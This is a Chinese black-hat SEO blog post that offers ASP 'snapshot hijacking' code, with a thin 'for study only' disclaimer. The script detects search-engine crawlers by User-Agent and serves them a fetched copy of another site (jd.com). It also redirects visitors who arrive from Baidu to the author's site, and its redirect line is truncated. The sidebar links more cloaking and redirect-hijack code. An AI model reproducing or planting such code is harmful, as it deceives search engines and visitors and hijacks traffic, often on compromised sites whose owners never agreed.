网站首页 站群教程 引流跳转代码 正文
本文为ASP快照劫持代码,请在txt记事本内创建本代码,并修改后缀为asp使用。
代码仅供学习测试,您可以将代码保存后上传到自己的网站内调试,切勿用于非法用途!
<% function GetBot() '查询蜘蛛 dim s_agent GetBot="" s_agent=Request.ServerVariables("HTTP_USER_AGENT") '关键判断语句 if instr(1,s_agent,"googlebot",1) >0 then GetBot="google" end if if instr(1,s_agent,"msnbot",1) >0 then GetBot="MSN" end if if instr(1,s_agent,"slurp",1) >0 then GetBot="Yahoo" end if if instr(1,s_agent,"baiduspider",1) >0 then GetBot="baidu" end if if instr(1,s_agent,"sohu-search",1) >0 then GetBot="Sohu" end if if instr(1,s_agent,"lycos",1) >0 then GetBot="Lycos" end if if instr(1,s_agent,"robozilla",1) >0 then GetBot="Robozilla" end if end function Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage=BytesToBstr(t,"GB2312")'编码 End function Function Newstring(wstr,strng) Newstring=Instr(lcase(wstr),lcase(strng)) if Newstring<=0 then Newstring=Len(wstr) End Function Function GetBody(url) on error resume next Set Retrieval = CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", url, False, "", "" .Send GetBody = .ResponseBody End With Set Retrieval = Nothing End Function Function BytesToBstr(body,Cset) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function Dim wstr,str,url,start,over,dtime if GetBot="baidu" then url="http://www.jd.com/" wstr=getHTTPPage(url) body=wstr response.write ""&body&"" response.end elseif GetBot="google" then url="http://www.jd.com/" wstr=getHTTPPage(url) body=wstr response.write ""&body&"" response.end end if if instr(Request.ServerVariables("http_referer"),"www.baidu.com")>0 then response.redirect("ccooc) end if %>
- 上一篇: 简单的JS快照劫持代码
- 下一篇: html页面JS引流劫持代码
必看说明
- 本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。
- 本站文章或仅为文本内容原创,非程序原创。如有侵权、不妥之处,请联系站长第一时间删除。敬请谅解!
- 本站所有内容严格遵守国家法律的条例,所有研究的算法技术均来源于搜索引擎公开默认允许用户研究使用的接口。
- 阅读本文及获取资源前,请确保您已充分阅读并理解《访问曹操SEO网站需知:行为准则》。
- 本站分享的任何工具、程序仅供学习参考编写架构,仅可在本地的虚拟机内断网测试,严禁联网运行或上传搭建!
- 任何资源必须在下载后24个小时内,从电脑中彻底删除。不得传播或者用于其他任何用途!否则一切后果用户自负!
- 转载请注明 : 文章转载自 曹操资源网 asp快照劫持跳转代码
- 本文标题:《asp快照劫持跳转代码》
- 本文链接:http://www.ccooc.cc/662.html
猜你喜欢
- 2022-10-03 多UA模拟蜘蛛访问站点工具V3
- 2022-10-01 随机iframe框架跳转的js代码
- 2022-04-12 实现访客查看同一链接,PC端和移动端显示不同页面的PHP代码
- 2022-04-12 屏蔽访客仅蜘蛛可见页面真实内容的PHP代码
- 2021-05-29 php定时进行百度推送的代码
- 2021-05-29 蜘蛛正常抓取访客跳转其他页面的代码
- 2021-05-29 判断如果用户来自百度搜索的跳转代码
- 2020-12-06 通过ua判断访客进行跳转的php代码
- 2020-09-27 关于最近通过点击引蜘蛛的一些见解
- 2020-05-21 分享一段定时广告代码
你 发表评论:
欢迎- 05-26警惕“冒用身份”的电信网络诈骗
- 05-11PHP使用纯真IP数据库输出ip位置
- 05-11ChatGPT的高效应用:指令大全
- 05-10堤防“瑞熙工作室”利用QQ及微信诈骗
- 05-10手机狐狸网资讯站群程序
- 05-10使用php在拼音转文字时过滤掉标点符号及英文字符
- 05-10买卖备案域名的法律规定
- 05-10泛目录站群的操作方法及注意事项
- 2008℃小米浏览器禁止网址访问的处理方法
- 868℃分析超度站群实现百度本周收录较多的站点
- 717℃免费的百度SEO搜索点击程序
- 706℃网站如何才能快速收录?
- 689℃我站最新联系方式通知
- 669℃搜狗推送链接引蜘蛛软件:Sougou推送程序
- 668℃CCbook小说站群无限制版
- 665℃使用Google账号接码指南
- 166℃警惕“冒用身份”的电信网络诈骗
- 143℃「百日行动」“断卡”行动持续发力
- 133℃遵纪守法:一起举报违法网址
- 343℃提防以免费做蜘蛛池为幌子卖域名的套路
- 522℃群内一切的私下交易行为,与我站无关!
- 177℃堤防“瑞熙工作室”利用QQ及微信诈骗
- 419℃提防“凤凰于飞”诈骗,加强网络安全认知!
- 504℃关于近期网站内容修改短期闭站的情况通知
- 文章归档
-
- 2023年5月 (17)
- 2023年4月 (45)
- 2023年3月 (23)
- 2023年2月 (9)
- 2023年1月 (11)
- 2022年12月 (9)
- 2022年11月 (4)
- 2022年10月 (33)
- 2022年9月 (41)
- 2022年8月 (19)
- 2022年7月 (19)
- 2022年6月 (20)
- 2022年5月 (9)
- 2022年4月 (42)
- 2022年3月 (65)
- 2022年2月 (1)
- 2022年1月 (4)
- 2021年12月 (23)
- 2021年11月 (2)
- 2021年10月 (4)
- 2021年9月 (22)
- 2021年8月 (70)
- 2021年7月 (1)
- 2021年6月 (21)
- 2021年5月 (28)
- 2021年4月 (1)
- 2021年3月 (42)
- 2021年1月 (8)
- 2020年12月 (34)
- 2020年11月 (15)
- 2020年10月 (39)
- 2020年9月 (107)
- 2020年8月 (37)
- 2020年7月 (22)
- 2020年6月 (46)
- 2020年5月 (120)
- 2020年4月 (76)
- 2020年3月 (81)
- 2020年2月 (69)
- 2020年1月 (14)
- 2019年12月 (38)
- 2019年11月 (11)
- 2019年10月 (25)
- 2019年9月 (2)
- 2017年10月 (1)
- 标签列表
- 站点信息
-
- 文章总数:1332
- 页面总数:1
- 分类总数:47
- 标签总数:337
- 评论总数:39
- 浏览总数:245225
本文暂时没有评论,来添加一个吧(●'◡'●)